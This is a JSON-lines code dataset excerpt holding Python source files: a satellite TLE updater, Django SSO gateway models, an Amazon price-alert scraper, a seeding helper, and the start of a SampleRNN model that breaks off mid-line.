"usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 115, "usage_type": "name"}, {"api_name": "ui.widgets.Button", "line_number": 116, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 116, "usage_type": "name"}, {"api_name": "pygame.event.get", "line_number": 154, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 154, "usage_type": "attribute"}, {"api_name": "psu.PSU", "line_number": 164, "usage_type": "call"}, {"api_name": "ui.widgets.Pannel", "line_number": 167, "usage_type": "call"}, {"api_name": "ui.widgets", "line_number": 167, "usage_type": "name"}, {"api_name": "ui.widgets.Button", "line_number": 174, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 174, "usage_type": "name"}, {"api_name": "ui.widgets.ToggleButton", "line_number": 177, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 177, "usage_type": "name"}, {"api_name": "ui.widgets.Frame", "line_number": 181, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 181, "usage_type": "name"}, {"api_name": "ui.widgets.FancyGauge", "line_number": 182, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 182, "usage_type": "name"}, {"api_name": "ui.widgets.Colours", "line_number": 185, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 185, "usage_type": "name"}, {"api_name": "ui.widgets.FancyGauge", "line_number": 189, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 189, "usage_type": "name"}, {"api_name": "ui.widgets.Colours", "line_number": 192, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 192, "usage_type": "name"}, {"api_name": "ui.widgets.Button", "line_number": 196, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 196, "usage_type": "name"}, {"api_name": "ui.widgets.Frame", "line_number": 200, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 200, "usage_type": "name"}, {"api_name": "ui.widgets.FancyGauge", "line_number": 201, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 201, "usage_type": "name"}, {"api_name": "ui.widgets.Colours", "line_number": 204, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 204, "usage_type": "name"}, {"api_name": "ui.widgets.FancyGauge", "line_number": 208, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 208, "usage_type": "name"}, {"api_name": "ui.widgets.Colours", "line_number": 211, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 211, "usage_type": "name"}, {"api_name": "ui.widgets.Button", "line_number": 215, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 215, "usage_type": "name"}, {"api_name": "ui.widgets.Frame", "line_number": 219, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 219, "usage_type": "name"}, {"api_name": "ui.widgets.ToggleButton", "line_number": 223, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 223, "usage_type": "name"}, {"api_name": "ui.widgets.ToggleButton", "line_number": 225, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 225, "usage_type": "name"}, {"api_name": "ui.widgets.ToggleButton", "line_number": 227, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 227, "usage_type": "name"}, {"api_name": "ui.widgets.ToggleButton", "line_number": 229, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 229, "usage_type": "name"}, {"api_name": "ui.widgets.ToggleButton", "line_number": 231, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 231, "usage_type": "name"}, {"api_name": "ui.widgets.ToggleButton", "line_number": 233, "usage_type": "attribute"}, {"api_name": "ui.widgets", "line_number": 233, "usage_type": "name"}, {"api_name": "pygame.time.Clock", "line_number": 237, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 237, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 238, "usage_type": "call"}, {"api_name": "time.time", "line_number": 239, "usage_type": "call"}, {"api_name": "time.time", "line_number": 335, "usage_type": "call"}, {"api_name": "time.time", "line_number": 336, "usage_type": "call"}, {"api_name": "time.time", "line_number": 339, "usage_type": "call"}, {"api_name": "time.time", "line_number": 340, "usage_type": "call"}, {"api_name": "pygame.event.get", "line_number": 345, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 345, "usage_type": "attribute"}, {"api_name": "serial.Serial", "line_number": 352, "usage_type": "call"}, {"api_name": "ui.surface.TouchScreen", "line_number": 354, "usage_type": "call"}, {"api_name": "ui.surface", "line_number": 354, "usage_type": "name"}]}
+{"seq_id": "16203859230", "text": "#!/usr/bin/env python3\n\n'''\ntlemanager.py\n2018-11-19\njonathanwesleystone+KI5BEX@gmail.com\n\nLoad and keep updated the local TLE database.\n'''\n\nimport json\n\nfrom datetime import datetime, timezone\n\nimport requests\n\nfrom skyfield.functions import BytesIO\nfrom skyfield.iokit import parse_tle\n\nclass TleManager:\n '''Keep the TLE files updated.\n '''\n\n def __init__(self, tlesrcfile=None, tledbcurrent=None, tledbhistory=None):\n '''load up a birdlist annotated with TLE sources\n\n :param tlesrcfile: JSON file linking the birds to their TLEs\n :param tledb: JSON file containing the downloaded TLE logs and history\n '''\n\n self.tlesrcfile = 'data/tle/choice_birds.json' if tlesrcfile is None else tlesrcfile\n self.tledbcurrent = 'tledbcurrent.json' if tledbcurrent is None else tledbcurrent\n self.tledbhistory = 'tledbhistory.json' if tledbhistory is None else tledbhistory\n\n try:\n with open(self.tlesrcfile, 'r') as fin:\n self.tlesrcs = json.load(fin)\n except FileNotFoundError:\n self.tlesrcs = {\n 'sources': []\n }\n\n self.tle = self.load()\n # this has the tle with our aliases\n self.tlestring = '\\n'.join([key + '\\n' + value.replace('n', '-') for key, value in self.tle.items()])\n self.bird = self.parse()\n\n def parse(self):\n '''Parse the loaded tle data using SkyField API.\n '''\n tle = {}\n for names, sat in parse_tle(BytesIO(bytes(self.tlestring, 'ascii'))):\n tle[sat.model.satnum] = sat\n for name in names:\n tle[name] = sat\n\n return tle\n\n def load(self):\n '''load the current tle data into a dict of {bird_alias: 'tle\\nlines'}\n '''\n\n try:\n with open(self.tledbcurrent, 'r') as fin:\n tledbcurrent = json.load(fin)\n except FileNotFoundError:\n tledbcurrent = {\n 'sources': []\n }\n\n bird_tles = {}\n for source in self.tlesrcs['sources']:\n if source in tledbcurrent:\n lines = tledbcurrent[source]['body'].splitlines()\n for birdname, bird in self.tlesrcs['birds'].items():\n if 'source' in bird and bird['source'] == source:\n lineiter = iter(lines)\n for line in lineiter:\n if bird['name'] == line.strip():\n bird_tles[birdname] = ((birdname + (' ' * 24))[:24]) + \\\n '\\n' + next(lineiter) + '\\n' + next(lineiter)\n break\n\n return bird_tles\n\n def update(self, keep_history=True):\n '''update the tles if needed\n '''\n try:\n with open(self.tledbcurrent, 'r') as fin:\n tledbcurrent = json.load(fin)\n except FileNotFoundError:\n tledbcurrent = {}\n\n try:\n with open(self.tledbhistory, 'r') as fin:\n tledbhistory = json.load(fin)\n except FileNotFoundError:\n tledbhistory = {}\n\n for source in self.tlesrcs['sources']:\n wsrc = tledbcurrent.get(source, {})\n\n headers = {}\n if 'etag' in wsrc:\n headers['etag'] = wsrc['etag']\n if 'last-modified' in wsrc:\n headers['If-Modified-Since'] = wsrc['last-modified']\n\n response = requests.get(self.tlesrcs['sources'][source]['url'], headers=headers)\n\n now = datetime.now(timezone.utc).astimezone().isoformat()\n\n wsrc['checked'] = now\n wsrc['status'] = response.status_code\n\n if response.status_code == 200:\n wsrc['body'] = response.text\n wsrc['updated'] = now\n\n if 'etag' in response.headers:\n wsrc['etag'] = response.headers['etag']\n if 'last-modified' in response.headers:\n wsrc['last-modified'] = response.headers['last-modified']\n\n tledbcurrent[source] = wsrc\n\n if keep_history:\n tledbhistory[source] = tledbhistory.get(source, [])\n tledbhistory[source].append({\n 'when': now,\n 'status': response.status_code,\n 'text': response.text,\n 'etag': response.headers.get('etag'),\n 'last-modified': response.headers.get('last-modified')\n })\n\n with open(self.tledbcurrent, 'w') as fout:\n json.dump(tledbcurrent, fout)\n\n if keep_history:\n with open(self.tledbhistory, 'w') as fout:\n json.dump(tledbhistory, fout)\n\n def __getitem__(self, bird):\n '''Bird fetcher -- return SkyField Satellite object parsed from the TLE identified by bird.\n '''\n return self.bird[bird]\n\nclass TestTleManager(TleManager):\n '''Test wrapper for TleManager.\n '''\n\n def __init__(self):\n '''Call super with test arguments for convenience.\n '''\n super().__init__(None, 'data/test/tledbcurrent.json', 'data/test/tledbhistory.json')\n", "repo_name": "piratejon/birdplans", "sub_path": "birdplans/tlemanager.py", "file_name": "tlemanager.py", "file_ext": "py", "file_size_in_byte": 5197, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "json.load", "line_number": 37, "usage_type": "call"}, {"api_name": "skyfield.iokit.parse_tle", "line_number": 52, "usage_type": "call"}, {"api_name": "skyfield.functions.BytesIO", "line_number": 52, "usage_type": "call"}, {"api_name": "json.load", "line_number": 65, "usage_type": "call"}, {"api_name": "json.load", "line_number": 91, "usage_type": "call"}, {"api_name": "json.load", "line_number": 97, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 110, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 112, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 112, "usage_type": "name"}, {"api_name": "datetime.timezone.utc", "line_number": 112, "usage_type": "attribute"}, {"api_name": "datetime.timezone", "line_number": 112, "usage_type": "name"}, {"api_name": "json.dump", "line_number": 139, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 143, "usage_type": "call"}]}
+{"seq_id": "19973138297", "text": "import logging\nfrom inspect import ismethod, isfunction\nfrom typing import Union\n\nimport requests\nfrom django.conf import settings\nfrom django.contrib.auth import get_user_model\nfrom django.contrib.auth.models import User\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.db import models\nfrom django.db.models import QuerySet\nfrom django.db.models.base import ModelBase\nfrom django.utils.crypto import get_random_string\nfrom django.utils.translation import gettext_lazy as _\n\nfrom django_sso.exceptions import SSOException\nfrom django_sso.sso_gateway import Settings\n\nuser_model = get_user_model()\n\n\ndef service_token_generator():\n return get_random_string(Service.token.field.max_length)\n\n\nclass Service(models.Model):\n name = models.CharField(max_length=128, verbose_name=_('Name'))\n base_url = models.URLField(verbose_name=_('Base url'))\n enabled = models.BooleanField(default=False, verbose_name=_('Enabled'))\n token = models.CharField(max_length=128, verbose_name=_('Token'), unique=True, default=service_token_generator)\n\n def __str__(self):\n return self.base_url\n\n def _send_event(self, event_type, data):\n text = None\n fail = False\n\n if hasattr(settings, 'SSO_SUBORDINATE_COMMUNICATION_TIMEOUT'):\n timeout = settings.SSO_SUBORDINATE_COMMUNICATION_TIMEOUT\n\n assert type(settings.SSO_SUBORDINATE_COMMUNICATION_TIMEOUT) in (int, float)\n else:\n timeout = 0.1 # 100ms\n\n try:\n result = requests.post(\n f'{self.base_url}/sso/event/',\n json={\n 'type': event_type,\n 'token': self.token,\n **data\n },\n headers={\n \"Content-Type\": \"application/json\"\n },\n timeout=timeout\n )\n except Exception as e:\n logging.error(f\"Django SSO: {_('Failed to communicate with subordinated service')} {self.base_url}: {e}\")\n\n return\n\n try:\n assert result.status_code == 200, f\"{result.text}\"\n data = result.json()\n\n ok = not not (data['ok'] if 'ok' in data else False)\n\n if ok:\n return ok\n elif 'error' in data:\n raise Exception(f\"Django SSO: {_('Error raised on subordinate service')}: {data['error']}\")\n else:\n raise Exception(result.text)\n except Exception as e:\n logging.error(f'{_(\"Incorrect response from subordinated service\")}: STATUS={result.status_code}; TEXT={e}')\n\n return\n\n @staticmethod\n def build_update_user_event(user):\n \"\"\"\n Build event for accounts update on subbordinated services\n\n Args:\n user: AbstractBaseUser based classes are allowed\n \"\"\"\n event = {\n 'fields': {}\n }\n\n for field in ('is_active', 'is_staff', 'is_superuser'):\n if hasattr(user_model, field):\n event['fields'][field] = bool(getattr(user, field))\n\n event['fields'][\"user_identy\"] = getattr(user, user_model.USERNAME_FIELD)\n\n if hasattr(settings, 'SSO') and 'ADDITIONAL_FIELDS' in settings.SSO:\n for additional_field in settings.SSO['ADDITIONAL_FIELDS']:\n field_info = additional_field.split(':')\n alias = field_info[1] if len(field_info) == 2 else None\n\n result = user\n\n try:\n for prop in field_info[0].split('.'):\n try:\n value = getattr(result, prop)\n except ObjectDoesNotExist:\n value = None\n break\n\n if value != None:\n result = value\n else:\n result = None\n break\n\n if ismethod(result):\n result = result()\n elif isinstance(result, models.Model):\n if hasattr(result, 'to_sso_representation'):\n result = result.to_sso_representation()\n else:\n result = str(result)\n except Exception as e:\n logging.warning('Django SSO: failed to read value for field %s: %s' % (field_info[0], e))\n result = None\n\n event['fields'][alias if alias else additional_field] = result\n\n return event\n\n @staticmethod\n def build_update_fields_event(user_identities: Union[set, QuerySet], instance: ModelBase):\n \"\"\"\n Build event for fields update on subbordinated services. Fields of related model.\n\n Args:\n user_identities: QuerySet with users\n instance: An updated related model\n \"\"\"\n\n sso_settings = Settings()\n\n event = {\n \"fields\": {},\n \"user_identities\": (\n [*user_identities.values_list(get_user_model().USERNAME_FIELD, flat=True)]\n if isinstance(user_identities, QuerySet)\n else user_identities\n )\n }\n\n for field_info in sso_settings.affected_models_fields[instance.__class__]:\n field_info = field_info.split(':')\n field_alias = field_info[1] if len(field_info) == 2 else None\n field_path = field_info[0].split('.')\n field_name = field_alias if field_alias else field_info[0]\n\n if instance:\n if len(field_path) == 1:\n if hasattr(instance, 'to_sso_representation'):\n value = instance.to_sso_representation()\n else:\n value = str(instance)\n elif len(field_path) == 2:\n model_attr = getattr(instance, field_path[1])\n\n if model_attr is None:\n value = None\n elif ismethod(model_attr):\n value = model_attr()\n elif isinstance(model_attr, property):\n value = model_attr\n else:\n value = model_attr\n else:\n logging.error('Django SSO: Unhandled exception. Contact developer with information about it.')\n\n if type(value) not in (str, bool, float, int):\n logging.error(\n f\"Django SSO: For additional field '{field_info}' provided unsupported type {type(value)}\"\n )\n value = None\n\n event['fields'][field_name] = value\n else:\n event['fields'][field_name] = None\n\n return event\n\n def deauthenticate(self, user: Union[str, ModelBase]):\n \"\"\"\n Send deauthentication event to subordinate service, if that active\n\n Args:\n user: User model object or user identy - username field value\n \"\"\"\n if not self.enabled:\n return True\n\n return self._send_event('deauthenticate', {\n 'user_identy': user if type(user) == str else getattr(user, user_model.USERNAME_FIELD)\n })\n\n def delete_user(self, user: Union[ModelBase, str]):\n \"\"\"\n Casts user deletion event\n\n @param user: User identy string or UserModel instance\n \"\"\"\n return self._send_event('delete_user', {\n 'user_identy': user if isinstance(user, str) else getattr(user, user_model.USERNAME_FIELD)\n })\n\n def change_user_identy(self, old, new):\n \"\"\"\n Emit event for changing user identy.\n\n In cases, when you change login|email|etc...\n\n @param old: Old user identy\n @param new: New user identy\n \"\"\"\n return self._send_event('change_user_identy', {\n 'old': old,\n 'new': new\n })\n\n def update_account(self, user) -> bool:\n \"\"\"\n Send account information to subordinated service, if subordinated service is active\n \"\"\"\n if not self.enabled:\n return True\n\n return self._send_event(\n event_type='update_account',\n data=self.build_update_user_event(user)\n )\n\n def update_fields(self, to_users: Union[QuerySet, set], instance: ModelBase = None) -> bool:\n \"\"\"\n Send event with updated fields of the related model, if subordinated service is active\n \"\"\"\n if not self.enabled or not len(to_users):\n return True\n\n return self._send_event(\n event_type='update_fields',\n data=self.build_update_fields_event(to_users, instance)\n )\n\n @staticmethod\n def cast_event_to_all_services(event_name: str, **kwargs):\n assert len(event_name) and not event_name.startswith('_'), f\"Bad event name {event_name}\"\n\n if not hasattr(Service, event_name) or not isfunction(getattr(Service, event_name)):\n raise Exception(f'Django SSO: {Service.__class__.__name__} has no method {event_name}')\n\n for service in Service.objects.filter(enabled=True):\n getattr(service, event_name)(**kwargs)\n\n class Meta:\n verbose_name = _('Subordinated service')\n verbose_name_plural = _('Subordinated services')\n\n\ndef auth_token_generator():\n return get_random_string(AuthenticationRequest.token.field.max_length)\n\n\nclass AuthenticationRequest(models.Model):\n service: Service = models.ForeignKey('Service', on_delete=models.CASCADE, verbose_name=_('Service'))\n created_at = models.DateTimeField(auto_now_add=True, verbose_name=_('Created at'))\n token = models.CharField(max_length=128, verbose_name=_('Token'), default=auth_token_generator, unique=True)\n user_identy = models.CharField(max_length=128, verbose_name=_('User identy'), help_text=_('E-Mail, login, etc.'))\n next_url = models.CharField(max_length=512, verbose_name=_('Next url'), help_text=_('To go after success auth'))\n authenticated = models.BooleanField(default=False, verbose_name=_('Request has been activated'))\n used = models.BooleanField(default=False, verbose_name=_('Are used in external sso service'))\n\n class Meta:\n verbose_name = _('Authentication request')\n verbose_name_plural = _('Authentication requests')\n\n def activate(self, user: User):\n \"\"\"\n 1) Activate authentication request\n 2) Send base information about user to subordinated service\n \"\"\"\n self.user_identy = getattr(user, user_model.USERNAME_FIELD)\n self.authenticated = True\n self.save()\n\n try:\n return self.service.update_account(user)\n except Exception as e:\n raise SSOException(str(e))\n\n def __str__(self):\n return f'{_(\"Authenticate\")} {self.user_identy} {_(\"on\")} {self.service} {_(\"then go to\")} {self.next_url}'\n", "repo_name": "DAVIDhaker/django-sso", "sub_path": "src/django_sso/sso_gateway/models.py", "file_name": "models.py", "file_ext": "py", "file_size_in_byte": 11025, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 22, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.contrib.auth.get_user_model", "line_number": 19, "usage_type": "call"}, {"api_name": "django.utils.crypto.get_random_string", "line_number": 23, "usage_type": "call"}, {"api_name": "django.db.models.Model", "line_number": 26, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 26, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 27, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 27, "usage_type": "name"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 27, "usage_type": "call"}, {"api_name": "django.db.models.URLField", "line_number": 28, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 28, "usage_type": "name"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 28, "usage_type": "call"}, {"api_name": "django.db.models.BooleanField", "line_number": 29, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 29, "usage_type": "name"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 29, "usage_type": "call"}, {"api_name": "django.db.models.CharField", "line_number": 30, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 30, "usage_type": "name"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 30, "usage_type": "call"}, {"api_name": "django.conf.settings", "line_number": 39, "usage_type": "argument"}, {"api_name": "django.conf.settings.SSO_SUBORDINATE_COMMUNICATION_TIMEOUT", "line_number": 40, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 40, "usage_type": "name"}, {"api_name": "django.conf.settings.SSO_SUBORDINATE_COMMUNICATION_TIMEOUT", "line_number": 42, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 42, "usage_type": "name"}, {"api_name": "requests.post", "line_number": 47, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 60, "usage_type": "call"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 60, "usage_type": "call"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 73, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 77, "usage_type": "call"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 77, "usage_type": "call"}, {"api_name": "django.conf.settings", "line_number": 99, "usage_type": "argument"}, {"api_name": "django.conf.settings.SSO", "line_number": 99, "usage_type": "attribute"}, {"api_name": "django.conf.settings.SSO", "line_number": 100, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 100, "usage_type": "name"}, {"api_name": "django.core.exceptions.ObjectDoesNotExist", "line_number": 110, "usage_type": "name"}, {"api_name": "inspect.ismethod", "line_number": 120, "usage_type": "call"}, {"api_name": "django.db.models.Model", "line_number": 122, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 122, "usage_type": "name"}, {"api_name": "logging.warning", "line_number": 128, "usage_type": "call"}, {"api_name": "typing.Union", "line_number": 136, "usage_type": "name"}, {"api_name": "django.db.models.QuerySet", "line_number": 136, "usage_type": "name"}, {"api_name": "django.db.models.base.ModelBase", "line_number": 136, "usage_type": "name"}, {"api_name": "django_sso.sso_gateway.Settings", "line_number": 145, "usage_type": "call"}, {"api_name": "django.db.models.QuerySet", "line_number": 151, "usage_type": "argument"}, {"api_name": "django.contrib.auth.get_user_model", "line_number": 150, "usage_type": "call"}, {"api_name": "inspect.ismethod", "line_number": 173, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 180, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 183, "usage_type": "call"}, {"api_name": "typing.Union", "line_number": 194, "usage_type": "name"}, {"api_name": "django.db.models.base.ModelBase", "line_number": 194, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 208, "usage_type": "name"}, {"api_name": "django.db.models.base.ModelBase", "line_number": 208, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 244, "usage_type": "name"}, {"api_name": "django.db.models.QuerySet", "line_number": 244, "usage_type": "name"}, {"api_name": "django.db.models.base.ModelBase", "line_number": 244, "usage_type": "name"}, {"api_name": "inspect.isfunction", "line_number": 260, "usage_type": "call"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 267, "usage_type": "call"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 268, "usage_type": "call"}, {"api_name": "django.utils.crypto.get_random_string", "line_number": 272, "usage_type": "call"}, {"api_name": "django.db.models.Model", "line_number": 275, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 275, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 276, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 276, "usage_type": "name"}, {"api_name": "django.db.models.CASCADE", "line_number": 276, "usage_type": "attribute"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 276, "usage_type": "call"}, {"api_name": "django.db.models.DateTimeField", "line_number": 277, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 277, "usage_type": "name"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 277, "usage_type": "call"}, {"api_name": "django.db.models.CharField", "line_number": 278, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 278, "usage_type": "name"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 278, "usage_type": "call"}, {"api_name": "django.db.models.CharField", "line_number": 279, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 279, "usage_type": "name"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 279, "usage_type": "call"}, {"api_name": "django.db.models.CharField", "line_number": 280, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 280, "usage_type": "name"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 280, "usage_type": "call"}, {"api_name": "django.db.models.BooleanField", "line_number": 281, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 281, "usage_type": "name"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 281, "usage_type": "call"}, {"api_name": "django.db.models.BooleanField", "line_number": 282, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 282, "usage_type": "name"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 282, "usage_type": "call"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 285, "usage_type": "call"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 286, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User", "line_number": 288, "usage_type": "name"}, {"api_name": "django_sso.exceptions.SSOException", "line_number": 300, "usage_type": "call"}, {"api_name": "django.utils.translation.gettext_lazy", "line_number": 303, "usage_type": "call"}]}
+{"seq_id": "32555115650", "text": "import requests\nfrom bs4 import BeautifulSoup\nimport smtplib\nURL = 'https://www.amazon.in/Apple-MacBook-16-inch-Storage-Intel-Core-i7/dp/B081JXDZFM/ref=sr_1_1_sspa?dchild=1&keywords=macbook&qid=1592241660&sr=8-1-spons&psc=1&spLa=ZW5jcnlwdGVkUXVhbGlmaWVyPUE3OE9EVDNFUzlMTDImZW5jcnlwdGVkSWQ9QTAyMDEzNTkxSkhVVUdSQ0xFSTJPJmVuY3J5cHRlZEFkSWQ9QTA0ODM5NTQyM0xFRFlBTlM1V09GJndpZGdldE5hbWU9c3BfYXRmJmFjdGlvbj1jbGlja1JlZGlyZWN0JmRvTm90TG9nQ2xpY2s9dHJ1ZQ=='\n\nheaders = {\n \"User-Agent\": \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0\"}\n\n\ndef check_price():\n page = requests.get(URL, headers=headers)\n\n soup = BeautifulSoup(page.content, 'html.parser')\n # print(soup.prettify())\n\n productTitle = soup.find(id='productTitle').get_text()\n price = soup.find(id='priceblock_ourprice').get_text()\n temp = ''\n for n in price[2:-3]:\n if n != ',':\n temp += n\n productPrice = int(temp)\n\n if productPrice > 185000:\n send_email()\n\n print(productPrice)\n print(productTitle.strip())\n\n\ndef send_email():\n server = smtplib.SMTP('smtp.gmail.com', 587)\n server.ehlo()\n server.starttls()\n server.ehlo()\n\n server.login('hraj2661999@gmail.com', 'RaNdOm_PaSsWoRd')\n\n subject = \"Price just fell down!\"\n body =\"Price just fell down!\\nCheck the link\"+URL\n\n msg = f\"Subject: {subject}\\n\\n{body}\"\n\n server.sendmail(\n 'hraj2661999@gmail.com',\n 'hraj2661999@gmail.com',\n msg\n )\n print('HEY! MAIL HAS BEEN SENT')\n\n server.quit()\n\nwhile(True):\n check_price()\n time.sleep(60*60*24)\n", "repo_name": "iamHrithikRaj/Python-App-That-Tracks-Amazon-Prices", "sub_path": "scraper.py", "file_name": "scraper.py", "file_ext": "py", "file_size_in_byte": 1561, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "requests.get", "line_number": 11, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 13, "usage_type": "call"}, {"api_name": "smtplib.SMTP", "line_number": 32, "usage_type": "call"}]}
+{"seq_id": "74095533289", "text": "import random\nimport numpy as np\nimport torch\n\n# For reproducibility\ndef set_seed(s):\n random.seed(s)\n np.random.seed(s)\n torch.manual_seed(s)\n\n torch.cuda.manual_seed_all(s)\n #add additional seed\n torch.backends.cudnn.deterministic=True\n torch.use_deterministic_algorithms = True", "repo_name": "yaozhong/SCLSC", "sub_path": "code/util.py", "file_name": "util.py", "file_ext": "py", "file_size_in_byte": 301, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "random.seed", "line_number": 7, "usage_type": "call"}, {"api_name": "numpy.random.seed", "line_number": 8, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 8, "usage_type": "attribute"}, {"api_name": "torch.manual_seed", "line_number": 9, "usage_type": "call"}, {"api_name": "torch.cuda.manual_seed_all", "line_number": 11, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 11, "usage_type": "attribute"}, {"api_name": "torch.backends", "line_number": 13, "usage_type": "attribute"}, {"api_name": "torch.use_deterministic_algorithms", "line_number": 14, "usage_type": "attribute"}]}
+{"seq_id": "27697231307", "text": "import numpy as np\nimport torch\nfrom .configuration import SampleRNNConfiguration\nfrom .utils import SampleRNNQuantizer, lecun_uniform, concat_init\nfrom typing import Dict\n\n\nclass FrameLevelSampleRNNModel(torch.nn.Module):\n \"\"\"Frame level module of the SampleRNN architecture\"\"\"\n\n frame_input_samples: int\n frame_ratio: int\n rnn_layers: int\n rnn_hidden_size: int\n conds_size: int\n\n _samples_expand_layer: torch.nn.Conv1d\n _conds_expand_layer: torch.nn.Conv1d\n\n _rnn_layer: torch.nn.GRU\n _rnn_layer_h0: torch.nn.Parameter\n\n _upsampling_layer: torch.nn.ConvTranspose1d\n _upsampling_layer_bias: torch.nn.Parameter\n\n def __init__(self, frame_input_samples: int, frame_ratio: int, rnn_layers: int, rnn_hidden_size: int,\n conds_size: int):\n\n # Call parent constructor\n super().__init__()\n\n # Store class parameters\n self.frame_input_samples = frame_input_samples\n self.frame_ratio = frame_ratio\n self.rnn_layers = rnn_layers\n self.rnn_hidden_size = rnn_hidden_size\n self.conds_size = conds_size\n\n # Create self._samples_expand_layer\n self._samples_expand_layer = torch.nn.Conv1d(\n in_channels=frame_input_samples,\n out_channels=rnn_hidden_size,\n kernel_size=1\n )\n\n # Create self._conds_expand_layer\n self._conds_expand_layer = torch.nn.Conv1d(\n in_channels=conds_size,\n out_channels=rnn_hidden_size,\n kernel_size=1\n )\n\n # Create self._rnn_layer\n self._rnn_layer = torch.nn.GRU(\n input_size=rnn_hidden_size,\n hidden_size=rnn_hidden_size,\n num_layers=rnn_layers,\n batch_first=True\n )\n\n # Create self._rnn_layer_h0\n self._rnn_layer_h0 = torch.nn.Parameter(torch.zeros(rnn_layers, rnn_hidden_size))\n\n # Create self._upsampling_layer\n self._upsampling_layer = torch.nn.ConvTranspose1d(\n in_channels=rnn_hidden_size,\n out_channels=rnn_hidden_size,\n kernel_size=frame_ratio,\n stride=frame_ratio,\n bias=False\n )\n\n # Create self._upsampling_layer_bias\n self._upsampling_layer_bias = torch.nn.Parameter(torch.FloatTensor(rnn_hidden_size, frame_ratio))\n\n # Reset Parameters\n self._upsampling_layer.reset_parameters()\n\n # Initialize learnable parameters\n self._initialize_learnable_parameters()\n self._normalize_learnable_parameters()\n\n def _initialize_learnable_parameters(self):\n \"\"\"Initializes the learnable parameters of the SampleLevelSampleRNNModel module\"\"\"\n\n torch.nn.init.kaiming_uniform_(self._samples_expand_layer.weight)\n torch.nn.init.constant_(self._samples_expand_layer.bias, 